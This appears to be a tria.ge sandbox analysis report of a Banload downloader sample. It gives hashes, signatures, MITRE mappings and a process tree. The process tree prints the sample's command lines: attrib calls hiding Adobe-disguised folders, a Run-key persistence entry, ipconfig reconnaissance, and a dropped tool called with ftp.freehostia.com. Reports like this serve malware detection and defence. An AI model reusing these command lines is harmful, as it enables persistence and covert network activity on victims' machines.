Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
- max time kernel: 10s
- platform: windows10-2004_x64
- resource: win10v2004-20240508-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 12/05/2024, 07:13
Static task: static1
Behavioral task: behavioral1
- Sample: 38e3b021f5cac0bc19bcdd76f6228771_JaffaCakes118.exe
- Resource: win7-20240221-en
Behavioral task: behavioral2
- Sample: 38e3b021f5cac0bc19bcdd76f6228771_JaffaCakes118.exe
- Resource: win10v2004-20240508-en
Errors
General
- Target: 38e3b021f5cac0bc19bcdd76f6228771_JaffaCakes118.exe
- Size: 4.3MB
- MD5: 38e3b021f5cac0bc19bcdd76f6228771
- SHA1: a6f23a56b70ef3ed327277bfec5eaf37d1505d89
- SHA256: 61540809d55eaa23ba0ac82ff4b530823c93fbc8e7097ccaeb8329e0eb1e48c1
- SHA512: cd9504a0b317b9efac96999ee3cd6c4869c97d222149216506c971c2de5144f03969885cbd925797f5fe687d10dcf86abfed7581515131b7051ab0e8b521f222
- SSDEEP: 98304:YkeMI+e05/Nm5OJumFPtQAcLFNKJ4LowZkh52h0mPtQAYTTN/:e0FNcmdEBNq4Loek7MQvN/
Malware Config
Signatures
- Banload
  Banload variants download malicious files, then install and execute the files.
- Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 1 IoC)
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | adbr01.exe
- Sets file to hidden (1 TTP, 6 IoCs)
  Modifies file attributes to stop it showing in Explorer etc.
  pid | Process
  1812 | attrib.exe
  2464 | attrib.exe
  856 | attrib.exe
  2064 | attrib.exe
  1404 | attrib.exe
  4532 | attrib.exe
- Checks BIOS information in registry (2 TTPs, 2 IoCs)
  BIOS information is often read in order to detect sandboxing environments.
  description | ioc | Process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | adbr01.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | adbr01.exe
- Checks computer location settings (2 TTPs, 4 IoCs)
  Looks up country code configured in the registry, likely geofence.
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | 38e3b021f5cac0bc19bcdd76f6228771_JaffaCakes118.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | WScript.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | cmd.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | WScript.exe
- Executes dropped EXE (3 IoCs)
  pid | Process
  2624 | Adobeta.exe
  1112 | adbr01.exe
  1628 | adbr01.exe
- (signature title not captured; UPX yara matches)
  resource | yara_rule
  behavioral2/files/0x00070000000233d6-16.dat | upx
  behavioral2/files/0x00070000000233d5-15.dat | upx
  behavioral2/files/0x00070000000233d7-21.dat | upx
  behavioral2/memory/2624-40-0x0000000000400000-0x0000000000446000-memory.dmp | upx
  behavioral2/memory/2624-43-0x0000000000400000-0x0000000000446000-memory.dmp | upx
  behavioral2/memory/1112-48-0x0000000000400000-0x00000000006E8000-memory.dmp | upx
  behavioral2/memory/1628-52-0x0000000000400000-0x00000000006E8000-memory.dmp | upx
  behavioral2/memory/1628-62-0x0000000000400000-0x00000000006E8000-memory.dmp | upx
  behavioral2/memory/1628-63-0x0000000000400000-0x00000000006E8000-memory.dmp | upx
  behavioral2/memory/1628-64-0x0000000000400000-0x00000000006E8000-memory.dmp | upx
  behavioral2/memory/1112-75-0x0000000000400000-0x00000000006E8000-memory.dmp | upx
- Adds Run key to start application (2 TTPs, 1 IoC)
  description | ioc | Process
  Set value (str) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sococsoE = "C:\\Users\\Admin\\AppData\\Roaming\\Adobe\\Adobe Inc\\AdobeRead\\aijw01.bat" | reg.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Enumerates system info in registry (2 TTPs, 1 IoC)
  description | ioc | Process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | xcopy.exe
- Gathers network information (2 TTPs, 1 IoC)
  Uses commandline utility to view network configuration.
  pid | Process
  3044 | ipconfig.exe
- Modifies registry class (7 IoCs)
  description | ioc | Process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{71E816AE-B6E7-34BA-0341-332B111F53E6}\InprocServer32 | adbr01.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{71E816AE-B6E7-34BA-0341-332B111F53E6}\InprocServer32\ = "%systemroot%\\SysWow64\\eapsimextdesktop.dll" | adbr01.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{71E816AE-B6E7-34BA-0341-332B111F53E6}\InprocServer32\ThreadingModel = "Apartment" | adbr01.exe
  Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings | 38e3b021f5cac0bc19bcdd76f6228771_JaffaCakes118.exe
  Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings | cmd.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{71E816AE-B6E7-34BA-0341-332B111F53E6} | adbr01.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{71E816AE-B6E7-34BA-0341-332B111F53E6}\ = "EAPSIM Identity Task class" | adbr01.exe
- Suspicious use of WriteProcessMemory (50 IoCs)
  Identical rows are collapsed; the last column is the number of times that row was recorded.
  description | pid | Process | procid_target | rows
  PID 1368 wrote to memory of 4760 | 1368 | 38e3b021f5cac0bc19bcdd76f6228771_JaffaCakes118.exe | 81 | 3
  PID 4760 wrote to memory of 4488 | 4760 | WScript.exe | 82 | 3
  PID 4488 wrote to memory of 3692 | 4488 | cmd.exe | 84 | 3
  PID 4488 wrote to memory of 4532 | 4488 | cmd.exe | 85 | 3
  PID 4488 wrote to memory of 1812 | 4488 | cmd.exe | 86 | 3
  PID 4488 wrote to memory of 2464 | 4488 | cmd.exe | 87 | 3
  PID 4488 wrote to memory of 1404 | 4488 | cmd.exe | 88 | 3
  PID 4488 wrote to memory of 856 | 4488 | cmd.exe | 89 | 3
  PID 4488 wrote to memory of 2064 | 4488 | cmd.exe | 90 | 3
  PID 4488 wrote to memory of 1616 | 4488 | cmd.exe | 91 | 3
  PID 1616 wrote to memory of 4400 | 1616 | WScript.exe | 92 | 3
  PID 4400 wrote to memory of 2624 | 4400 | cmd.exe | 94 | 3
  PID 4400 wrote to memory of 4048 | 4400 | cmd.exe | 95 | 3
  PID 4400 wrote to memory of 3044 | 4400 | cmd.exe | 96 | 3
  PID 4400 wrote to memory of 1112 | 4400 | cmd.exe | 97 | 3
  PID 1112 wrote to memory of 1628 | 1112 | adbr01.exe | 98 | 5
- Views/modifies file attributes (1 TTP, 6 IoCs)
  pid | Process
  1812 | attrib.exe
  2464 | attrib.exe
  856 | attrib.exe
  2064 | attrib.exe
  1404 | attrib.exe
  4532 | attrib.exe
Processes
- [1] C:\Users\Admin\AppData\Local\Temp\38e3b021f5cac0bc19bcdd76f6228771_JaffaCakes118.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\38e3b021f5cac0bc19bcdd76f6228771_JaffaCakes118.exe"
  PID: 1368
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\SysWOW64\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\ZREA.vbs"
    PID: 4760
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\enikiol02.bat" /quiet /norestart"
      PID: 4488
      - Checks computer location settings
      - Modifies registry class
      - Suspicious use of WriteProcessMemory
      - [4] C:\Windows\SysWOW64\xcopy.exe
        Command line: xcopy /y /h /e /r /k /c *.* "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\"
        PID: 3692
        - Enumerates system info in registry
      - [4] C:\Windows\SysWOW64\attrib.exe
        Command line: attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead"
        PID: 4532
        - Sets file to hidden
        - Views/modifies file attributes
      - [4] C:\Windows\SysWOW64\attrib.exe
        Command line: attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\AdobeR"
        PID: 1812
        - Sets file to hidden
        - Views/modifies file attributes
      - [4] C:\Windows\SysWOW64\attrib.exe
        Command line: attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\ADBR\READER"
        PID: 2464
        - Sets file to hidden
        - Views/modifies file attributes
      - [4] C:\Windows\SysWOW64\attrib.exe
        Command line: attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER"
        PID: 1404
        - Sets file to hidden
        - Views/modifies file attributes
      - [4] C:\Windows\SysWOW64\attrib.exe
        Command line: attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR"
        PID: 856
        - Sets file to hidden
        - Views/modifies file attributes
      - [4] C:\Windows\SysWOW64\attrib.exe
        Command line: attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\RAdobe\RADBR\AREADER"
        PID: 2064
        - Sets file to hidden
        - Views/modifies file attributes
      - [4] C:\Windows\SysWOW64\WScript.exe
        Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\nimiki09.vbs"
        PID: 1616
        - Checks computer location settings
        - Suspicious use of WriteProcessMemory
        - [5] C:\Windows\SysWOW64\cmd.exe
          Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Adobe\Adobe INC\AadobeRead\enikiol03.bat" /quiet /norestart"
          PID: 4400
          - Suspicious use of WriteProcessMemory
          - [6] C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exe
            Command line: Adobeta.exe -x -x -x -d -nuttyhdff -s:nuttyhdff.nuttyhdff ftp.freehostia.com -nuttyhdff
            PID: 2624
            - Executes dropped EXE
          - [6] C:\Windows\SysWOW64\reg.exe
            Command line: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "sococsoE" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\aijw01.bat"
            PID: 4048
            - Adds Run key to start application
          - [6] C:\Windows\SysWOW64\ipconfig.exe
            Command line: ipconfig /all
            PID: 3044
            - Gathers network information
          - [6] C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
            Command line: adbr01.exe -f "011.011"
            PID: 1112
            - Executes dropped EXE
            - Suspicious use of WriteProcessMemory
            - [7] C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
              Command line: adbr01.exe -f "011.011"
              PID: 1628
              - Identifies VirtualBox via ACPI registry values (likely anti-VM)
              - Checks BIOS information in registry
              - Executes dropped EXE
              - Modifies registry class
          - [6] C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr02.exe
            Command line: adbr02.exe -f "112.112"
            PID: 1928
Network
MITRE ATT&CK Enterprise v15
- Privilege Escalation: Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Defense Evasion: Hide Artifacts (2): Hidden Files and Directories (2); Modify Registry (1); Virtualization/Sandbox Evasion (1)
Downloads
- Filesize: 106B
  MD5: 4b474101cde9031b36105bbc0856b8f2
  SHA1: 78120dbc9bf88dd21b9de6c3012ce55c0a88efce
  SHA256: 68ce4767cbde30b24cb244bc56ee938a6de52780fab7012d6c8f859b56b7f0a9
  SHA512: 5ec24355ec7646157904f874da91186fdca3618a6d0034d9454abd4660cba9356ebb4616a19e97ce4d614f25fd70816ea76e3d569ad7a1623330466247330edb
- Filesize: 108KB
  MD5: daeaadb1e509ee3568645b725c7e5029
  SHA1: 2a463493e707e19d6c3444665f696f1e846483d4
  SHA256: 62d34d5206dfc434c5a5713181adbec88ae8dbbf8faa7809edf763dab939aca7
  SHA512: f74156acaec9b7822fce94eb8115115b40edbb0e4fcabfdf22f6d1bda1c75bc182fe4b874cc0170fbe9414b3e05f593d3c4b71aedece65142ad62e87d2567038
- Filesize: 127KB
  MD5: 12af68f7d332050c34bdd79fcc8970c7
  SHA1: e99d9858b9dd3f21b22035193c888280ea54030b
  SHA256: 9e3ef05a090bf38988d826efcfafeeac97433745d580faf5e7d162f2fd464d10
  SHA512: a500004e2b4a4a477a2680b45d72dec8190220a6bcb560c4a758c49c31996b0f950ff98a5edd29ca7215cffa4012a5e384d70953d9efd9b0504d2f90763e7946
- Filesize: 519B
  MD5: bd641fd8a89df0d37d06e70c1190385b
  SHA1: 519d3f83a3bb15e17e7c39241d7e88224a9088d5
  SHA256: d71a091be2133db33293d57919a38198dbcd62f14ac4362a9b5813ad118c6fe0
  SHA512: 160c1a27f3897eee99333b9a561d803d8f607d8ec6b0fcb36e09332e4fc0af590d3a5d0ea9481e2da9b0376afca01675fb1a8d41b3b194d60614e7122567ea06
- Filesize: 2.1MB
  MD5: 0fa6655f07e9fb4530581ed792b5d9a5
  SHA1: cfb92afe0c03243d94ee1a6c0dd6437f644fb5a2
  SHA256: 13e048a6e41796b9038a55e634d54d2976dfa781fdaa051d635e4303e034536a
  SHA512: b8be270621176e54cfc98cfaa5d06afedab96a41ec19ab3078b62d85c76faf1f33d449ff26762758f2ac7a78abd7fb1dfb8ee52f6eda310921c76bd5c696618e
- Filesize: 2.1MB
  MD5: 2bdedc125e74a995b2409d5155b9ea15
  SHA1: 51f1a7b99c6fa5cab61395ef5ce4b98c37648407
  SHA256: d36b2721aa9a44391ba00d3533906cc481e2e67fbc8169409631614b38171a0d
  SHA512: 22fd2a64cba4efe97c9d661017cff3e4143017e7e0feb75e8c84cf180143616d9d5c6a746914c85e45c0d9e0d87b37d9b4663593e94e2238e8f4ad86e64e5998
- Filesize: 205B
  MD5: 4a7b39c1281e958c383f4500c3cceb42
  SHA1: d374728df66cbcf862ac1dee320c4347eeba3fd3
  SHA256: 76a5096de7785bd0e16b2141ce23be096a0fdf687361a1b9cc7e2fc078693c07
  SHA512: 3d64ae760fc89743c4c71f445239c2e10b58b829b79bc28fc66e7bcb6d5f0eed59d1ebce6497586648885f7c5e190caafff167c2e146228783bfae1f7b3f30e7
- Filesize: 923B
  MD5: 7b1fb7ccb83e2be074c8eb5afd7e3675
  SHA1: 89eefff900c60269078d12f5495c4838ccda62e0
  SHA256: 742ef36cbe95b5528c13e001c5040b75bf6aef22299731864318095e87bc4cb4
  SHA512: a4be580f5c07c7e1d0171ffc2990cf1dd838ca77d7584a3d70bba62b2276bca899d4af22fd0a28dd284c7ec28b1223f551a0ad040cf89d92aa34aa2fb1196eb0
- Filesize: 1KB
  MD5: a0eda0c5e3684e57fcd2f68a298b1446
  SHA1: 39e10699ae54cff7bdc4887e54f44f0ac8ced2de
  SHA256: b063723077544ae58431e6d6d846e95164548180bc829d3d06bd0211a33d47e2
  SHA512: 5bde11ed902768662bf0cdd3a9f96d7d7b3c0d67ced5b29e9aa15b1b52120be1762b279a1a8888f8ba866873c00949d1f08d586aa50224f30391ae9b5181f168
- Filesize: 548B
  MD5: 211f29b36069c5d74bb2fc624e3b750e
  SHA1: 4dde779a3951aae084e147da8f7298d316bb5ab5
  SHA256: fd80fc307f7ddddb874a38d249d14fcc9fa0ea7add12c37cc49c4337df42eb8d
  SHA512: ea5fdef56c58a6afbb7f04a1cb5c24054175cf7eea87e636488d4861798b95d2e63378e18c3c5afa03231fab3a15fe674f4d1d4f017dffbe0bc8b4f7836d87be
- Filesize: 107B
  MD5: d18b3077b533ad3c357a5eb91b580fdf
  SHA1: 67a818c98c35dfc03a5218c4920241b1e8c57245
  SHA256: 0996a6841a0d31a6e1051924d6dc3be6588f7297b8c23d6e08d6461c87f1d0ad
  SHA512: 6f6e0acc83d13ebbff0e8cbde53e03704bb4b2da27a18222475a7c366e51ad9cb200e562ed18dc8fc8491af306509af16d4b2eab57fe784aaae16f9a0ed84db5